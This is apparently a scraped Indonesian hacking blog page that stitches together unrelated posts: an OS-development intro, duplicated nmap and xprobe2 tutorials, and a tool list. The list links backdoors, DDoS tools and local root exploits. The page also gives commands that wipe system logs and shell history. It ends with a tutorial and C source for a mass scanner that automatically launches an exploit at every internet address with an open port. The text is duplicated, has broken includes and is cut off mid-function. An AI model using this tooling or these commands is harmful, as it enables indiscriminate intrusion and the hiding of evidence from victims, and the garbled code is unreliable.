Jadi Anda Ingin Membuat Sendiri Sistem Operasi x86?
By Patrick Mahoney
1. Perkenalan
Salah satu kesulitan besar yang dihadapi oleh programmer hobbyist ketika mulai mencoba mengembangkan sistem operasinya sendiri adalah menentukan dari mana ia harus memulai. Banyak buku menjelaskan dengan mendalam konsep sistem operasi secara teoritis, namun tidak satu pun yang tampaknya bisa membawa programmer hobbyist untuk memahami konsep tersebut. Ini adalah apa yang akan dilakukan oleh artikel ini.
Beberapa artikel yang berhubungan dengan topik ini muncul di beberapa edisi terakhir Linux Gazette. Saya merencanakan untuk melakukan pendekatan dengan menggunakan sesedikit mungkin gaya yang berorientasi pemrograman, dan hanya akan menunjukkan kepada pembaca tool dan tips yang akan ia butuhkan untuk memulai pengembangan dari sistem operasinya. Sekali ia membaca artikel ini, pembaca yang tertarik seharusnya segera mulai browsing segala sesuatu yang ia perlukan yang tersedia dan memulai untuk mendesain dan mengetikkan kode program.
Anda mungkin tidak mengerti, bahwa pengembangan suatu sistem operasi tidak dimulai dari awal. (!!) Menulis sebuah bootloader yang bagus akan menjadi keseluruhan proyek itu sendiri, dan saya tidak menyarankan anda untuk memulai sebuah proyek pengembangan sistem operasi dengan menulis sebuah bootloader. Banyak bootloader yang handal tersedia dengan bebas (Grub, lilo, ppcboot, dan lain-lain...). Jika anda berencana untuk menulisnya sendiri, saya menyarankan untuk menunda pekerjaan ini pada bagian lain dari proyek. Pada artikel ini, saya akan menggunakan GNU Grub, Grand Unified Bootloader.
Jumat, Februari 25, 2005
NMAP TUTORIAL ++ BAB II
Other Scanning Techniques
In my opinion nmap is the most superior network scanner. But there are some newer technologies being developed that are worth mentioning.
Xprobe2 ICMP based fingerprinting
Xprobe is a ICMP based passive fingerprinting tool, this is a newer technique being used very successfully instead of the old TCP based fingerprinting. Xprobe uses a different ICMP response to determine what Operating system the host is running, very similar to TCP based fingerprinting it compares it's results to a database. Another advantage of ICMP based fingerprinting is it's very fast, in most cases all it needs is one packet, unlike nmaps TCP fingerprinting thats needs to build custom packets and is quite time consuming, ICMP does not need to craft any specific packets. Each operating system has small differences in implementations of there TCP stack and Xprobe has a database of those differences.
[root@REDHATBOX xprobe2-0.1]# xprobe2 -v 192.168.0.3
XProbe2 v.0.1 Copyright (c) 2002-2003 fygrave@tigerteam.net, ofir@sys-security.com
[+] Target is 192.168.0.3
[+] Loading modules.
[+] Following modules are loaded:
[x]ICMP echo (ping)
[x]TTL distance
[x]ICMP echo
[x]ICMP Timestamp
[x]ICMP Address
[x]ICMP Info Request
[x]ICMP port unreach
[+] 7 modules registered
[+] Initializing scan engine
[+] Running scan engine
[+] Host: 192.168.0.3 is up (Guess probability: 100%)
[+] Target: 192.168.0.3 is alive
[+] Primary guess:
[+] Host 192.168.0.3 Running OS: "Linux Kernel 2.4.5 and above" (Guess probability: 95%)
[+] Other guesses:
[+] Host 192.168.0.3 Running OS: "Linux Kernel 2.2.x" (Guess probability: 95%)
[+] Host 192.168.0.3 Running OS: "NetBSD 1.6" (Guess probability: 87%)
[+] Host 192.168.0.3 Running OS: "Linux Kernel 2.4.0 - 2.4.4" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "SCO OpenServer Release 5" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "OpenBSD 2.5" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "NetBSD 1.5.0" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "NetBSD 1.5.1" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "NetBSD 1.5.2" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "FreeBSD 4.5" (Guess probability: 79%)
[+] Host 192.168.0.3 Running OS: "FreeBSD 4.4" (Guess probability: 79%)
-------------------------------------SNIP---------------------------------------------------------
Xprobe has successfully identified the operating system as linux running kernel 2.45. Thats correct. This test took about 30-60seconds so its allot faster than Nmaps -O TCP fingerprinting. The next test was how it would go against a windows XP pro box.
In my opinion nmap is the most superior network scanner. But there are some newer technologies being developed that are worth mentioning.
Xprobe2 ICMP based fingerprinting
Xprobe is a ICMP based passive fingerprinting tool, this is a newer technique being used very successfully instead of the old TCP based fingerprinting. Xprobe uses a different ICMP response to determine what Operating system the host is running, very similar to TCP based fingerprinting it compares it's results to a database. Another advantage of ICMP based fingerprinting is it's very fast, in most cases all it needs is one packet, unlike nmaps TCP fingerprinting thats needs to build custom packets and is quite time consuming, ICMP does not need to craft any specific packets. Each operating system has small differences in implementations of there TCP stack and Xprobe has a database of those differences.
[root@REDHATBOX xprobe2-0.1]# xprobe2 -v 192.168.0.3
XProbe2 v.0.1 Copyright (c) 2002-2003 fygrave@tigerteam.net, ofir@sys-security.com
[+] Target is 192.168.0.3
[+] Loading modules.
[+] Following modules are loaded:
[x]ICMP echo (ping)
[x]TTL distance
[x]ICMP echo
[x]ICMP Timestamp
[x]ICMP Address
[x]ICMP Info Request
[x]ICMP port unreach
[+] 7 modules registered
[+] Initializing scan engine
[+] Running scan engine
[+] Host: 192.168.0.3 is up (Guess probability: 100%)
[+] Target: 192.168.0.3 is alive
[+] Primary guess:
[+] Host 192.168.0.3 Running OS: "Linux Kernel 2.4.5 and above" (Guess probability: 95%)
[+] Other guesses:
[+] Host 192.168.0.3 Running OS: "Linux Kernel 2.2.x" (Guess probability: 95%)
[+] Host 192.168.0.3 Running OS: "NetBSD 1.6" (Guess probability: 87%)
[+] Host 192.168.0.3 Running OS: "Linux Kernel 2.4.0 - 2.4.4" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "SCO OpenServer Release 5" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "OpenBSD 2.5" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "NetBSD 1.5.0" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "NetBSD 1.5.1" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "NetBSD 1.5.2" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "FreeBSD 4.5" (Guess probability: 79%)
[+] Host 192.168.0.3 Running OS: "FreeBSD 4.4" (Guess probability: 79%)
-------------------------------------SNIP---------------------------------------------------------
Xprobe has successfully identified the operating system as linux running kernel 2.45. Thats correct. This test took about 30-60seconds so its allot faster than Nmaps -O TCP fingerprinting. The next test was how it would go against a windows XP pro box.
NMAP TUTOR ++ BAB I
Introduction to Nmap
Nmap is the network exploration tool, it is essentially one of the most important tools to a security engineer or pen-tester. It is used as it's name suggests as a network exploration tool. With nmap you can probe a entire network and find out what services are listening on each specific port. Not only that but it incorporates fingerprinting that compares different fingerprints and gives you a estimate on what operating system the machine is running. Nmap has allot of options or flags that let you manipulate how it scans, you can simply do a tcp()connect scan that makes a full connection to the host or a syn scan also known as half connection, test firewall rules and distinguish if they are firewalls or packet filters, idle scan and spoof your ip through another machine or throw out decoys to make your presence less traceable. Nmap runs on linux/bsd and windows, although we will only be discussing it's usage under linux, the windows version is just a port from linux and can still be used as a supplement if you want but you do have access to the linux version in the attack lab.
Options and flags
The nmap options or flags are a set of inbuilt variables that help you modify how nmap probes machines.
By simply typing nmap at the command prompt you will get a breif explaination of each flag.
[root@REDHATBOX root]# nmap
Nmap 3.30 Usage: nmap [Scan Type(s)] [Options]
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p ports to scan. Example range: '1-1024,1080,6666,31337'
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-6 scans via IPv6 rather than IPv4
-T General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG Output normal/XML/grepable scan logs to
-iL Get targets from file; Use '-' for stdin
* -S/-e Specify source address or network interface
--interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES
Syn/Stealth Scanning. -sS TCP SYN stealth port scan (default if privileged (root))
Nmap is the network exploration tool, it is essentially one of the most important tools to a security engineer or pen-tester. It is used as it's name suggests as a network exploration tool. With nmap you can probe a entire network and find out what services are listening on each specific port. Not only that but it incorporates fingerprinting that compares different fingerprints and gives you a estimate on what operating system the machine is running. Nmap has allot of options or flags that let you manipulate how it scans, you can simply do a tcp()connect scan that makes a full connection to the host or a syn scan also known as half connection, test firewall rules and distinguish if they are firewalls or packet filters, idle scan and spoof your ip through another machine or throw out decoys to make your presence less traceable. Nmap runs on linux/bsd and windows, although we will only be discussing it's usage under linux, the windows version is just a port from linux and can still be used as a supplement if you want but you do have access to the linux version in the attack lab.
Options and flags
The nmap options or flags are a set of inbuilt variables that help you modify how nmap probes machines.
By simply typing nmap at the command prompt you will get a breif explaination of each flag.
[root@REDHATBOX root]# nmap
Nmap 3.30 Usage: nmap [Scan Type(s)] [Options]
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-6 scans via IPv6 rather than IPv4
-T
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG
-iL
* -S
--interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES
Syn/Stealth Scanning. -sS TCP SYN stealth port scan (default if privileged (root))
tools hacking
from my friends
toolss
http://www.gohanz.com/tools.htm
http://brutalside.host.sk/
http://www.gohanz.com/tutor.htm
http://brutalside.host.sk/tools/ftp.tgz
http://brutalside.host.sk/tools/lame.tgz
http://brutalside.host.sk/tools/massplo.tar.gz
http://brutalside.host.sk/tools/massplor.tar.gz
http://brutalside.host.sk/tools/trinoo.tgz
This is my favorites backdoor
http://brutalside.host.sk/tools/tk8.tar.gz
http://www.geocities.com/brutalside/backdoor/tk8.tar.gz
http://brutalside.host.sk/tools/trojanit.tar.gz
http://www.geocities.com/brutalside/backdoor/trojanit.tar.gz
http://brutalside.host.sk/tools/shv4.tar.gz
http://www.geocities.com/brutalside/backdoor/shv4.tar.gz
http://brutalside.host.sk/tools/term
This is my misc tools
http://brutalside.host.sk/tools/psyBNC2%255B1%255D.2.1-linux-i86-static.tar.gz
http://brutalside.host.sk/tools/psybnc2.2.2.tar.gz
http://brutalside.host.sk/tools/kik
toolsss
http://brutalside.host.sk/tools/wget-1.5.1-1.i386.rpm
http://brutalside.host.sk/tools/gcc-3.0.4.tar.gz
This is for local exploit
http://brutalside.host.sk/tools/local.tar.gz
http://brutalside.host.sk/tools/local2.tar.gz
COBALT LOCAL EXPLOIT :: aucobalt60.sh :: [ usage : sh aucobalt60.sh ]
http://brutalside.host.sk/tools/aucobalt60.sh
This is for removing logs
write this for remove the history : export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0
Write this for remove all logs : rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
---------
http://www.gohanz.com/putty.exe
http://www.gohanz.com/msamba.tar.gz
http://www.gohanz.com/shv4.tar.gz
http://www.gohanz.com/Luckroot.tar
http://www.gohanz.com/xpost.tgz
http://www.gohanz.com/grabbb-0.1.0.tar.gz
http://www.gohanz.com/udpflood.zip
http://www.gohanz.com/iisscan.zip
http://www.gohanz.com/port.tcl
http://www.gohanz.com/bind
http://www.gohanz.com/massplo.tar.gz
http://www.gohanz.com/psyBNC2.3.tar.gz
toolss
http://www.gohanz.com/tools.htm
http://brutalside.host.sk/
http://www.gohanz.com/tutor.htm
http://brutalside.host.sk/tools/ftp.tgz
http://brutalside.host.sk/tools/lame.tgz
http://brutalside.host.sk/tools/massplo.tar.gz
http://brutalside.host.sk/tools/massplor.tar.gz
http://brutalside.host.sk/tools/trinoo.tgz
This is my favorites backdoor
http://brutalside.host.sk/tools/tk8.tar.gz
http://www.geocities.com/brutalside/backdoor/tk8.tar.gz
http://brutalside.host.sk/tools/trojanit.tar.gz
http://www.geocities.com/brutalside/backdoor/trojanit.tar.gz
http://brutalside.host.sk/tools/shv4.tar.gz
http://www.geocities.com/brutalside/backdoor/shv4.tar.gz
http://brutalside.host.sk/tools/term
This is my misc tools
http://brutalside.host.sk/tools/psyBNC2%255B1%255D.2.1-linux-i86-static.tar.gz
http://brutalside.host.sk/tools/psybnc2.2.2.tar.gz
http://brutalside.host.sk/tools/kik
toolsss
http://brutalside.host.sk/tools/wget-1.5.1-1.i386.rpm
http://brutalside.host.sk/tools/gcc-3.0.4.tar.gz
This is for local exploit
http://brutalside.host.sk/tools/local.tar.gz
http://brutalside.host.sk/tools/local2.tar.gz
COBALT LOCAL EXPLOIT :: aucobalt60.sh :: [ usage : sh aucobalt60.sh ]
http://brutalside.host.sk/tools/aucobalt60.sh
This is for removing logs
write this for remove the history : export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0
Write this for remove all logs : rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
---------
http://www.gohanz.com/putty.exe
http://www.gohanz.com/msamba.tar.gz
http://www.gohanz.com/shv4.tar.gz
http://www.gohanz.com/Luckroot.tar
http://www.gohanz.com/xpost.tgz
http://www.gohanz.com/grabbb-0.1.0.tar.gz
http://www.gohanz.com/udpflood.zip
http://www.gohanz.com/iisscan.zip
http://www.gohanz.com/port.tcl
http://www.gohanz.com/bind
http://www.gohanz.com/massplo.tar.gz
http://www.gohanz.com/psyBNC2.3.tar.gz
scanner hacking gabungan
/*********************************************************
* Mass Scanner menggunakan gabungan
* beberapa tool dan satu exploit
*
* oleh : iko (iko94@yahoo.com)
* release : dec,15,200*
*
* No Warranty. This tutorial is for educational use only,
* commercial use is prohibited.
*
**********************************************************/
Masih ingat dengan artikel berjudul "Menggunakan Mass Scanner Dengan Telnet
Fingerprint Metode Shell Scripting" (milik mas scut di indohack.sf.net) ?
Artikel tersebut menerangkan tentang bagaimana cara mencoba satu exploit ke banyak
target sasaran yang berupa daftar di satu file. Mass Scanner Telnet Fingerprint itu
mempunyai satu kelemahan yaitu kita harus sudah membuat satu daftar nomor ip yang
akan di-scan.
Nah, bagaimana caranya agar kita tinggal mengetikkan satu baris perintah saja dan
semuanya akan berjalan dengan sendirinya ?
Berikut ini akan penulis jelaskan caranya, beserta tools yang diperlukan.
Tools:
1. mass.c (dicomot dari massplo.tar.gz milik mas slamet, source code di bawah)
2. mig-port-scan.c (milik no1 => greyhats.za.net , source code ada di bawah)
3. sebuah script sederhana (try.sh)
4. sebuah file log temporer
5. sebuah exploit
6. banyak kesabaran :)
Pertama-tama tentukan satu exploit yang akan dipakai (contoh : explo.c), kemudian
compile file tersebut (catatan : anda harus memahami betul bagaimana cara kerja
exploit tersebut). Langkah ke dua, compile file mig-port-scan.c . Langkah ke tiga,
buatlah satu script sederhana, yang akan kita gunakan untuk melakukan pengecekan
server target mana yang mempunyai port yang terbuka sesuai dengan kebutuhan exploit
kita, jika benar terbuka, maka exploit akan dijalankan dan melakukan penetrasi ke
server target.
Contoh script sederhana ini :
-----------try.sh start here--------------
#!/bin/sh
#
./mig-port-scan -h $1 -p port_yg_discan -o log_temporer
sleep 1
cat log_temporer
CEK="`cat log_temporer | awk '{print $2}'`"
if [ "$CEK" = "Open" ]; then
echo "OK server $1 terbuka, kita coba..."
./exploit -t $1
fi
echo "kita coba yang lain..... :("
-----------try.sh end here-----------------
Simpan dan chmod +x try.sh ini.
Perhatikan bahwa argumen $1 di atas mewakili nomor ip target kita, sedang sleep 1
detik digunakan untuk menanti konek back dari mig-port-scan (yaitu hasil scan).
Perhatikan juga tanda baca backquote (jangan sampai salah lho !) di variable CEK.
Anda juga harus mengganti baris ./exploit -t $1 , dengan perintah untuk menjalankan
exploit anda (dengan segala argumen-nya tentu!).
Ada dua keuntungan pemakaian try.sh ini, yaitu jika terjadi kondisi :
1. ketika exploit kita mandeg di tengah jalan (seperti stagnant/nyantol);
2. ketika kita sudah berhasil masuk ke suatu server target, dan kita ingin
meneruskan proses scanning kita;
maka kita tinggal memencet tombol control+c, dan proses pun akan terus berjalan,
karena yang ditutup adalah program script ini dan bukan program mass.
Nah, kita tinggal mengedit program utama, yaitu mass.c
Perhatikan source mass.c di baris perintah berikut:
sprintf(luck,"./try.sh %s",(char *)inet_ntoa(connlist[i].addr.sin_addr),(time(0)-connlist[i].a));
nah di situlah letak script kita tadi, baris tersebut menjalankan script kita
dengan cara memberikannya ke variabel luck (lihat baris system(luck);). Masih
tertarik ? Makanya segera belajarlah bahasa pemrograman !!!
Langkah terakhir, kita harus mengkompile mass.c agar bisa kita jalankan.
#gcc mass.c -o massexploit -Wall
lalu jalankan mass scanner kita :
#./massexploit
ikuti petunjuknya !
Selamat mencoba !!!
Berikut ini source code mass.c:
-----------------mass.c begin here-------------------------
#include
#include
#include
#include
#include
#include
#include
#include
#define MAX_SOCKETS 500
#define TIMEOUT 5
#define S_NONE 0
#define S_CONNECTING 1
struct conn_t {
int s;
char status;
time_t a;
struct sockaddr_in addr;
};
struct conn_t connlist[MAX_SOCKETS];
void init_sockets(void);
void check_sockets(void);
void fatal(char *);
int main(int argc, char *argv[])
{
int done, i, aa, bb, cc, dd, ret, k, ns;
unsigned int port;
time_t scantime;
char ip[20];
if (argc < 3) {
printf("Usage: %s [b-block] [c-block]\n", argv[0]);
return -1;
}
done = 0; bb = 0; cc = 0; dd = 0; aa = 0; port = 0;
aa = atoi(argv[1]);
if ((aa < 0) || (aa > 255)) {
fatal("Invalid a-range\n");
}
port = (unsigned int)atoi(argv[2]);
if (port == 0)
fatal("Bad port number.\n");
if (argc >= 4) {
bb = atoi(argv[3]);
if ((bb < 0) || (bb > 255))
fatal("Invalid b-range.\n");
}
if (argc >= 5) {
cc = atoi(argv[4]);
if ((cc < 0) || (cc > 255))
fatal("Invalid c-range.\n");
}
init_sockets();
scantime = time(0);
while(!done) {
for (i = 0; i < MAX_SOCKETS; i++) {
if (dd == 255) {
if (cc < 255) {
cc++;
dd = 0;
}
else {
if (bb < 255) {
bb++;
cc = 0;
dd = 0;
}
else {
if (aa < 255) {
aa++;
bb = 0;
cc = 0;
dd = 0;
}
else {
ns = 0;
for (k = 0; k < MAX_SOCKETS; k++) {
if (connlist[k].status > S_NONE)
ns++;
}
if (ns == 0)
break;
}
}
}
}
if (connlist[i].status == S_NONE) {
connlist[i].s = socket(AF_INET, SOCK_STREAM, 0);
if (connlist[i].s != -1) {
ret = fcntl(connlist[i].s, F_SETFL, O_NONBLOCK);
if (ret == -1) {
printf("Unable to set O_NONBLOCK\n");
close(connlist[i].s);
}
else {
memset((char *)ip, 0, 20);
sprintf(ip, "%d.%d.%d.%d", aa, bb, cc, dd);
connlist[i].addr.sin_addr.s_addr = inet_addr(ip);
if (connlist[i].addr.sin_addr.s_addr == -1)
fatal("Invalid IP.");
connlist[i].addr.sin_family = AF_INET;
connlist[i].addr.sin_port = htons(port);
connlist[i].a = time(0);
connlist[i].status = S_CONNECTING;
dd++;
}
}
}
}
check_sockets();
}
}
void init_sockets(void)
{
int i;
for (i = 0; i < MAX_SOCKETS; i++) {
connlist[i].status = S_NONE;
memset((struct sockaddr_in *)&connlist[i].addr, 0,
sizeof(struct sockaddr_in));
}
}
void check_sockets(void)
{
int i, ret;
for (i = 0; i < MAX_SOCKETS; i++) {
if ((connlist[i].a < (time(0) - TIMEOUT)) &&
(connlist[i].status == S_CONNECTING)) {
close(connlist[i].s);
connlist[i].status = S_NONE;
}
else if (connlist[i].status == S_CONNECTING) {
ret = connect(connlist[i].s,
(struct sockaddr *)&connlist[i].addr,
sizeof(struct sockaddr_in));
if (ret == -1) {
if (errno == EISCONN) {
printf("%s\n",
(char *)inet_ntoa(connlist[i].addr.sin_addr),
(time(0)-connlist[i].a));
close(connlist[i].s);
connlist[i].status = S_NONE;
}
if ((errno != EALREADY) && (errno != EINPROGRESS)) {
close(connlist[i].s);
connlist[i].status = S_NONE;
}
}
else {
char luck[100];
sprintf(luck,"./try.sh %s",(char *)inet_ntoa(connlist[i].addr.sin_addr),(time(0)-connlist[i].a));
printf("Sodok ip %s\n",
(char *)inet_ntoa(connlist[i].addr.sin_addr),
(time(0)-connlist[i].a));
system(luck);
printf("Wuasuu, cuk...\n");
close(connlist[i].s);
connlist[i].status = S_NONE;
}
}
}
}
void fatal(char *err)
{
int i;
printf("Error: %s\n", err);
for (i = 0; i < MAX_SOCKETS; i++) {
if (connlist[i].status >= S_CONNECTING)
close(connlist[i].s);
}
exit(-1);
}
---------------mass.c end here--------------------------------------
Berikut source code mig-port-scan.c
---------------mig-port-scan.c start here---------------------------
/****************
name : mig-port-scan.c
version : 1.0
creation date : 15th of October 2002
author : no1 ( greyhats.za.net )
description : veeery fast connect() port scanner
with multi-host scanning support
usage : gcc mig-port-scan.c -o mig-port-scan -Wall
./mig-port-scan
extra : nmap is just too slow for simple connect()
scans of big IP lists thats why i coded this.
if you have any comments or suggestions, mail
me at no1@greyhats.za.net or msg me at
http://greyhats.za.net/guestbook/
****************/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int scan(char *ip, int port, int time_out, int debug, FILE ** log, int logcheck, int v);
int get_port(char *ports, char *backup);
int Connect(int fd, char *ip, int port, int time_out, int debug);
int usage(char *arg);
long hosts_scanned = 0;
long ports_scanned = 12;
int main(int argc, char **argv)
{
int TIMEOUT = 3;
int CHILDREN = 50;
int PORT = 0;
int DEBUG = 0;
int i = 0;
int p = 0;
int log_check = 0;
int flag = 0;
int status;
int verbose = 0;
FILE *fp;
FILE *ld;
char IP[16] = "127.0.0.1";
char INPUT[256] = "./input318";
char OUTPUT[256] = "./log";
char PORTS[256] = "21,22,23,25,53,80,110,111,113,119,143,515,:";
char PORTS_BACKUP[256] = "21,22,23,25,53,80,110,111,113,119,143,515,:";
char *P_PORTS;
char *P_PORTS_BACKUP;
char opt;
P_PORTS = PORTS;
P_PORTS_BACKUP = PORTS_BACKUP;
while((opt = getopt(argc, argv, "h:i:p:o:c:t:vd")) != -1)
{
switch (opt)
{
case 'h':// ip
{
flag++;
bzero(IP, sizeof(IP));
strcpy(IP, optarg);
remove("./input318");
fp = fopen(INPUT, "w");
fprintf(fp, "%s\n", IP);
fclose(fp);
fp = fopen(INPUT, "r");
break;
}
case 'i':// file with ips
{
flag++;
bzero(INPUT, sizeof(INPUT));
strcpy(INPUT, optarg);
fp = fopen(INPUT, "r");
break;
}
case 'p':// ports in 21,22,23 format
{
bzero(PORTS, sizeof(PORTS));
bzero(PORTS_BACKUP, sizeof(PORTS_BACKUP));
strcpy(PORTS, optarg);
strcpy(PORTS_BACKUP, optarg);
strcat(PORTS, ",:");
strcat(PORTS_BACKUP, ",:");
puts("TEST");
ports_scanned = 0;
for(; PORTS[p] != 0; p++)
{
if(PORTS[p] == 44)
ports_scanned++;
}
break;
}
case 'o':// log file (stdout if not used)
{
log_check = 1;
strcpy(OUTPUT, optarg);
ld = fopen(OUTPUT, "w");
break;
}
case 'c':// number of children
{
CHILDREN = atoi(optarg);
break;
}
case 't':// timeout value for connect/read/write
{
TIMEOUT = atoi(optarg);
break;
}
case 'v':// verbose mode
{
verbose++;
break;
}
case 'd':// debuging output
{
DEBUG = 1;
break;
}
}
}
if((flag == 2) || (flag == 0))
{
usage(argv[0]);
exit(1);
}
while((fgets(IP, sizeof(IP), fp)) != NULL)
{
hosts_scanned++;
}
fclose(fp);
printf("\n [0;32m******************************** [0m\n");
printf(" [0;32m* MIG Port Scanner v1.0 by [0;31mno1 [0;32m* [0m\n");
printf(" [0;32m******************************** [0m\n\n");
printf("Hosts being scanned: %ld\n", hosts_scanned);
printf("Ports being scanned: %ld\n\n", ports_scanned);
bzero(IP, sizeof(IP));
fp = fopen(INPUT, "r");
while((fgets(IP, sizeof(IP), fp)) != NULL)
{
IP[strlen(IP) - 1] = '\0';
for(; (PORT = get_port(P_PORTS, P_PORTS_BACKUP)) != 0; i++)
{
switch (fork())
{
case 0:
{
scan(IP, PORT, TIMEOUT, DEBUG, &ld, log_check, verbose);
_exit(0);
break;
}
case -1:
{
perror("fork error");
_exit(0);
break;
}
default:
{
if(i > CHILDREN - 2)
{
wait(&status);
i--;
}
break;
}
}
}
bzero(IP, sizeof(IP));
}
remove("./input318");
fclose(fp);
return 0;
}
int scan(char *ip, int port, int time_out, int debug, FILE ** log, int logcheck, int v)
{
FILE *logs = *log;
int sockfd;
int stat;
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> socket() error\n", ip, port);
return (-1);
}
stat = Connect(sockfd, ip, port, time_out, debug);
if(stat == -1)
{
if(logcheck == 1)
{
if(v == 1)
fprintf(logs, "[%s][%d] Closed\n", ip, port);
fflush(logs);
close(sockfd);
}
else
{
if(v == 1)
fprintf(stdout, "[%s][%d] Closed\n", ip, port);
fflush(stdout);
close(sockfd);
}
return (-1);
}
if(stat == -2)
{
if(logcheck == 1)
{
if(v == 1)
fprintf(logs, "[%s][%d] Closed (could be firewall)\n", ip, port);
fflush(logs);
close(sockfd);
}
else
{
if(v == 1)
fprintf(stdout, "[%s][%d] Closed (could be firewall)\n", ip, port);
fflush(stdout);
close(sockfd);
}
return (-1);
}
else
{
if(logcheck == 1)
{
fprintf(logs, "[%s][%d] Open\n", ip, port);
fflush(logs);
close(sockfd);
}
else
{
fprintf(stdout, "[%s][%d] Open\n", ip, port);
fflush(stdout);
close(sockfd);
}
}
return (0);
}
int get_port(char *ports, char *backup)
{
int i;
int x;
int z;
char port[5];
char tmp[256];
bzero(port, sizeof(port));
bzero(tmp, sizeof(tmp));
strcpy(tmp, ports);
for(i = 0; ports[i] != ','; i++)
{
if(ports[i] == ':')
{
strcpy(ports, backup);
return 0;
}
port[i] = ports[i];
}
port[strlen(port)] = '\0';
for(z = strlen(port) + 1, x = 0; z < strlen(ports); z++)
{
ports[x++] = tmp[z];
}
ports[x] = '\0';
return atoi(port);
}
int Connect(int fd, char *ip, int port, int time_out, int debug)
{
int flags;
int select_status;
fd_set connect_read, connect_write;
struct timeval timeout;
int getsockopt_length = 0;
int getsockopt_error = 0;
struct sockaddr_in server;
bzero(&server, sizeof(server));
server.sin_family = AF_INET;
inet_pton(AF_INET, ip, &server.sin_addr);
server.sin_port = htons(port);
if((flags = fcntl(fd, F_GETFL, 0)) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error getting socket flags\n", ip, port);
close(fd);
return (-1);
}
if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error setting socket non-blocking\n", ip, port);
close(fd);
return (-1);
}
timeout.tv_sec = time_out;
timeout.tv_usec = 0;
FD_ZERO(&connect_read);
FD_ZERO(&connect_write);
FD_SET(fd, &connect_read);
FD_SET(fd, &connect_write);
if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0)
{
if(errno != EINPROGRESS)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> connect() error\n", ip, port);
close(fd);
return (-1);
}
}
else
{
if(fcntl(fd, F_SETFL, flags) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error setting socket flags to original state\n", ip, port);
close(fd);
return (-1);
}
return (1);
}
select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);
if(select_status == 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> connect() timed out\n", ip, port);
close(fd);
return (-2);
}
if(select_status == -1)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> select() error on connect()\n", ip, port);
close(fd);
return (-1);
}
if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write))
{
if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write))
{
getsockopt_length = sizeof(getsockopt_error);
if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0)
{
errno = ETIMEDOUT;
